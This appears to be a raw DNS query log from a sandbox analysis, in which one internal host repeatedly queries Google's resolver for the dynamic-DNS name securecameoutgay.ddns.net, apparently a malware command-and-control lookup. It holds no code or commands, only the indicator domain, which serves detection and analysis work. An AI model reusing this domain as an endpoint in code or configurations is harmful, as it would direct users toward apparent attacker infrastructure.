                                                    Oct 12, 2024 23:05:18.703253984 CEST192.168.2.148.8.8.80x808eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.711605072 CEST192.168.2.148.8.8.80xa661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.719345093 CEST192.168.2.148.8.8.80xa661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.726644039 CEST192.168.2.148.8.8.80xa661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.734162092 CEST192.168.2.148.8.8.80xa661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.742264032 CEST192.168.2.148.8.8.80xa661Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.750772953 CEST192.168.2.148.8.8.80xd671Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.758492947 CEST192.168.2.148.8.8.80xd671Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.766297102 CEST192.168.2.148.8.8.80xd671Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.774231911 CEST192.168.2.148.8.8.80xd671Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.782434940 CEST192.168.2.148.8.8.80xd671Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.790975094 CEST192.168.2.148.8.8.80xed86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.798767090 CEST192.168.2.148.8.8.80xed86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.806591034 CEST192.168.2.148.8.8.80xed86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.814054966 CEST192.168.2.148.8.8.80xed86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.821312904 CEST192.168.2.148.8.8.80xed86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.829103947 CEST192.168.2.148.8.8.80x4f5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.836513042 CEST192.168.2.148.8.8.80x4f5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.844345093 CEST192.168.2.148.8.8.80x4f5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.852734089 CEST192.168.2.148.8.8.80x4f5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.860325098 CEST192.168.2.148.8.8.80x4f5bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.868451118 CEST192.168.2.148.8.8.80xe54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.876451015 CEST192.168.2.148.8.8.80xe54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.884649992 CEST192.168.2.148.8.8.80xe54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.892066002 CEST192.168.2.148.8.8.80xe54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.899795055 CEST192.168.2.148.8.8.80xe54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.908049107 CEST192.168.2.148.8.8.80x841cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.915286064 CEST192.168.2.148.8.8.80x841cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.923213959 CEST192.168.2.148.8.8.80x841cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.931183100 CEST192.168.2.148.8.8.80x841cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.938508034 CEST192.168.2.148.8.8.80x841cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.947073936 CEST192.168.2.148.8.8.80xd204Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.954374075 CEST192.168.2.148.8.8.80xd204Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.961832047 CEST192.168.2.148.8.8.80xd204Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.969590902 CEST192.168.2.148.8.8.80xd204Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.976948977 CEST192.168.2.148.8.8.80xd204Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.985605955 CEST192.168.2.148.8.8.80x806bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.993757963 CEST192.168.2.148.8.8.80x806bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.001353025 CEST192.168.2.148.8.8.80x806bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.008861065 CEST192.168.2.148.8.8.80x806bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.016006947 CEST192.168.2.148.8.8.80x806bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.024260998 CEST192.168.2.148.8.8.80xa39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.031430960 CEST192.168.2.148.8.8.80xa39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.038803101 CEST192.168.2.148.8.8.80xa39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.045836926 CEST192.168.2.148.8.8.80xa39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.052840948 CEST192.168.2.148.8.8.80xa39aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.061163902 CEST192.168.2.148.8.8.80xb58aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.068141937 CEST192.168.2.148.8.8.80xb58aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.075318098 CEST192.168.2.148.8.8.80xb58aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.082333088 CEST192.168.2.148.8.8.80xb58aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.090337992 CEST192.168.2.148.8.8.80xb58aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.098001003 CEST192.168.2.148.8.8.80xbea8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.105150938 CEST192.168.2.148.8.8.80xbea8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.112437963 CEST192.168.2.148.8.8.80xbea8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.119781017 CEST192.168.2.148.8.8.80xbea8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.127460957 CEST192.168.2.148.8.8.80xbea8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.135102034 CEST192.168.2.148.8.8.80xf5ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.143213987 CEST192.168.2.148.8.8.80xf5ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.150670052 CEST192.168.2.148.8.8.80xf5ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.158399105 CEST192.168.2.148.8.8.80xf5ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.166512966 CEST192.168.2.148.8.8.80xf5ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.175303936 CEST192.168.2.148.8.8.80x9cecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.182121038 CEST192.168.2.148.8.8.80x9cecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.189650059 CEST192.168.2.148.8.8.80x9cecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.196676016 CEST192.168.2.148.8.8.80x9cecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.203881025 CEST192.168.2.148.8.8.80x9cecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.211412907 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.218925953 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.229175091 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.236635923 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.243758917 CEST192.168.2.148.8.8.80x9921Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.251604080 CEST192.168.2.148.8.8.80x6bceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.259834051 CEST192.168.2.148.8.8.80x6bceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.268373013 CEST192.168.2.148.8.8.80x6bceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.275552988 CEST192.168.2.148.8.8.80x6bceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.282977104 CEST192.168.2.148.8.8.80x6bceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.290501118 CEST192.168.2.148.8.8.80xc872Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.298051119 CEST192.168.2.148.8.8.80xc872Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.305088997 CEST192.168.2.148.8.8.80xc872Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.312544107 CEST192.168.2.148.8.8.80xc872Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.320089102 CEST192.168.2.148.8.8.80xc872Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.327812910 CEST192.168.2.148.8.8.80x62a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.335306883 CEST192.168.2.148.8.8.80x62a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.342633963 CEST192.168.2.148.8.8.80x62a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.350017071 CEST192.168.2.148.8.8.80x62a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.357703924 CEST192.168.2.148.8.8.80x62a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.366321087 CEST192.168.2.148.8.8.80x9c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.373796940 CEST192.168.2.148.8.8.80x9c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.381418943 CEST192.168.2.148.8.8.80x9c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.389054060 CEST192.168.2.148.8.8.80x9c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.396131039 CEST192.168.2.148.8.8.80x9c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.404340982 CEST192.168.2.148.8.8.80x1546Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.412229061 CEST192.168.2.148.8.8.80x1546Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.419810057 CEST192.168.2.148.8.8.80x1546Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.426968098 CEST192.168.2.148.8.8.80x1546Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.434432030 CEST192.168.2.148.8.8.80x1546Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.442171097 CEST192.168.2.148.8.8.80xd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.449352980 CEST192.168.2.148.8.8.80xd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.456867933 CEST192.168.2.148.8.8.80xd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.464200020 CEST192.168.2.148.8.8.80xd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.471483946 CEST192.168.2.148.8.8.80xd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.479849100 CEST192.168.2.148.8.8.80x3c85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.487457037 CEST192.168.2.148.8.8.80x3c85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.494807005 CEST192.168.2.148.8.8.80x3c85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.504509926 CEST192.168.2.148.8.8.80x3c85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.512104988 CEST192.168.2.148.8.8.80x3c85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.519686937 CEST192.168.2.148.8.8.80xb51fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.527456045 CEST192.168.2.148.8.8.80xb51fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.534732103 CEST192.168.2.148.8.8.80xb51fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.541657925 CEST192.168.2.148.8.8.80xb51fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.548830032 CEST192.168.2.148.8.8.80xb51fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.556557894 CEST192.168.2.148.8.8.80xa6caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.563555956 CEST192.168.2.148.8.8.80xa6caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.570581913 CEST192.168.2.148.8.8.80xa6caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.577572107 CEST192.168.2.148.8.8.80xa6caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.584487915 CEST192.168.2.148.8.8.80xa6caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.592080116 CEST192.168.2.148.8.8.80x4121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.599054098 CEST192.168.2.148.8.8.80x4121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.605994940 CEST192.168.2.148.8.8.80x4121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.613102913 CEST192.168.2.148.8.8.80x4121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.620158911 CEST192.168.2.148.8.8.80x4121Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.627985954 CEST192.168.2.148.8.8.80xe008Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.635096073 CEST192.168.2.148.8.8.80xe008Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.642199993 CEST192.168.2.148.8.8.80xe008Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.649400949 CEST192.168.2.148.8.8.80xe008Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.656608105 CEST192.168.2.148.8.8.80xe008Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.664124966 CEST192.168.2.148.8.8.80x8b6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.671497107 CEST192.168.2.148.8.8.80x8b6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.678633928 CEST192.168.2.148.8.8.80x8b6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.685913086 CEST192.168.2.148.8.8.80x8b6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.693454981 CEST192.168.2.148.8.8.80x8b6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.700951099 CEST192.168.2.148.8.8.80x9520Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.708028078 CEST192.168.2.148.8.8.80x9520Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.714869976 CEST192.168.2.148.8.8.80x9520Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.721990108 CEST192.168.2.148.8.8.80x9520Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.728916883 CEST192.168.2.148.8.8.80x9520Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.736356974 CEST192.168.2.148.8.8.80x54d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.743418932 CEST192.168.2.148.8.8.80x54d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.750502110 CEST192.168.2.148.8.8.80x54d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.757740021 CEST192.168.2.148.8.8.80x54d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.764894009 CEST192.168.2.148.8.8.80x54d8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.772628069 CEST192.168.2.148.8.8.80x3b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.779548883 CEST192.168.2.148.8.8.80x3b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.786748886 CEST192.168.2.148.8.8.80x3b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.795506954 CEST192.168.2.148.8.8.80x3b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.802683115 CEST192.168.2.148.8.8.80x3b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.810213089 CEST192.168.2.148.8.8.80x3554Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.817346096 CEST192.168.2.148.8.8.80x3554Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.824832916 CEST192.168.2.148.8.8.80x3554Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.832010031 CEST192.168.2.148.8.8.80x3554Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.839234114 CEST192.168.2.148.8.8.80x3554Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.846971035 CEST192.168.2.148.8.8.80xe714Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.854356050 CEST192.168.2.148.8.8.80xe714Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.861346960 CEST192.168.2.148.8.8.80xe714Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.868577003 CEST192.168.2.148.8.8.80xe714Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.875909090 CEST192.168.2.148.8.8.80xe714Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.883553982 CEST192.168.2.148.8.8.80x3c48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.890713930 CEST192.168.2.148.8.8.80x3c48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.897885084 CEST192.168.2.148.8.8.80x3c48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.905049086 CEST192.168.2.148.8.8.80x3c48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.912322998 CEST192.168.2.148.8.8.80x3c48Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.921154976 CEST192.168.2.148.8.8.80x2a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.928277016 CEST192.168.2.148.8.8.80x2a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.959681034 CEST192.168.2.148.8.8.80x2a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.967487097 CEST192.168.2.148.8.8.80x2a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.974356890 CEST192.168.2.148.8.8.80x2a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.981990099 CEST192.168.2.148.8.8.80x7becStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.988894939 CEST192.168.2.148.8.8.80x7becStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:19.995922089 CEST192.168.2.148.8.8.80x7becStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.002918005 CEST192.168.2.148.8.8.80x7becStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.010457039 CEST192.168.2.148.8.8.80x7becStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.018156052 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.026041985 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.033747911 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.042007923 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.050914049 CEST192.168.2.148.8.8.80x4a19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.059700966 CEST192.168.2.148.8.8.80x4abbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.067054033 CEST192.168.2.148.8.8.80x4abbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.074263096 CEST192.168.2.148.8.8.80x4abbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.081773996 CEST192.168.2.148.8.8.80x4abbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.091559887 CEST192.168.2.148.8.8.80x4abbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.099701881 CEST192.168.2.148.8.8.80xa414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.107547045 CEST192.168.2.148.8.8.80xa414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.115242004 CEST192.168.2.148.8.8.80xa414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.123343945 CEST192.168.2.148.8.8.80xa414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.130592108 CEST192.168.2.148.8.8.80xa414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.138242006 CEST192.168.2.148.8.8.80xa77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:20.149405956 CEST192.168.2.148.8.8.80xa77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
